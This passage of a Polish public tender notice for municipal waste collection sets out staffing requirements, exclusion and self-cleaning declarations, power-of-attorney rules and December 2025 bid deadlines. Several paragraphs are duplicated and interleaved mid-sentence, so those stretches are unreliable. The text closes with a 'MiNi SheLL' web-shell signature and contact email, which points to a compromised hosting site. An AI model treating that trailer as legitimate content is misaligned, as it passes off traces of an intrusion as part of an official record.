Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (t.j. Dz. U. z 2013 r. poz. 122).<br/><br/>Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia.<br/><br/>m) Dysponuje następującymi osobami skierowanymi przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług:<br/>- co najmniej 1 osoba na stanowisku związanym z organizacją i logistyką odbioru odpadów komunalnych z nieruchomości (zarządzanie transportem) oraz nadzorowaniem jakości wykonywania prac,<br/>- co najmniej 2 osobami na stanowiskach robotniczych z wymaganymi kwalifikacjami (potwierdzonymi zaświadczeniami lub świadectwami ukończenia odpowiednich kursów), tj. kierowców samochodów specjalistycznych, posiadających prawo jazdy kategorii C oraz świadectwo kwalifikacji zawodowej potwierdzające posiadanie stosownych uprawnień w niezbędnym zakresie do realizacji przedmiotu zamówienia, w tym co najmniej 1 osoba posiadająca zaświadczenie o ukończeniu kursu uprawniającego do obsługi urządzeń transportu bliskiego wydane przez Urząd Dozoru Technicznego.<br/>- co najmniej 4 osobami na stanowiskach robotniczych (ładowaczy odpadów).<br/>Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2). Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II podrozdziałach 7 i 8<br/>SWZ zał. nr 5, 5a, 5b do SWZ. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień składania ofert.<br/>3). Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>4). Oświadczenie składają<br/>odrębnie<br/>a) wykonawca/każdy spośród wykonawców wspólnie ubie<br/>gających się o udzielenie<br/>zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia<br/>wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>b<br/>) podmiot trzeci, na którego potencjał powołuje się wykonawca celem potwierdzenia<br/>spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza<br/>brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby wykonawcy;<br/>c) podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu spełnienia<br/>warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak<br/>podstaw wykluczenia podwykonawcy<br/>5) Samooczyszczenie<br/>w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 i 6 lub art.<br/>109 ust. 1 pkt 2 10 ustawy Pzp, wykonawca nie podlega wykluczeniu jeżeli udowodni<br/>zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>a) naprawił lub zob<br/>owiązał się do naprawienia szkody wyrządzonej przestępstwem,<br/>wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez<br/>zadośćuczynienie pieniężne;<br/>b) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem<br/>lub swoim niepr awidłowym postępowaniem oraz spowodowanymi przez nie szkodami,<br/>15<br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania<br/>aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania lub zamawiającym;lub zamawiającym;<br/>c) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla<br/>c) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności: zerwał wszelkie powiązania z osobami lub podmiotami postępowaniu, w szczególności: zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy, zreorganizował personel, odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy, zreorganizował personel, wdrożył system sprawozdawczości i wdrożył system sprawozdawczości i kontroli, utworzył struktury audytu wewnętrznego do kontroli, utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów, monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów, wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulanieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.cji lub standardów.<br/>Zamawiający ocenia, czy podjęte przez wykonawcę czynności są wystarczające do<br/>Zamawiający ocenia, czy podjęte przez wykonawcę czynności są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza wykonawcę.wykonawcy, a jeżeli uzna, że nie są wystarczające, wyklucza wykonawcę.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym w rozdziale II – zał. nr 5, 5a, 5b do SWZ tymczasowo zastępujący wymagane podmiotowe środki dowodowe</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie przewiduje obowiązku przedłożenia przez Wykonawcę przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo<br/>Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowieniapełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo powinno być<br/>załączone do oferty i powinno zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego<br/>dotyczy,<br/>wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby, ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>Wymagana forma:<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym, lub podpisem osobistym.<br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez<br/>notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (zał. nr 9 do SWZ)<br/>Zobowiązanie podmiotu trzeciego – (zał. nr 10 do SWZ)<br/>Wykaz rozwiązań równoważnych<br/>Zastrzeżenie tajemnicy przedsiębiorstwa <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia do SWZ<br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród któryc h tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>-<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>Wymagana forma:<br/>Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej<br/>16<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do<br/>opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencireprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie e rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> zgodnie z zapisami w umowie stanowiący załącznik numer 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-12-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">siekierczyn.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-12-18 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2026-01-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca oświadcza, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 7 ust. 1 w związku z ust. 9 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514)

Creat By MiNi SheLL
Email: jattceo@gmail.com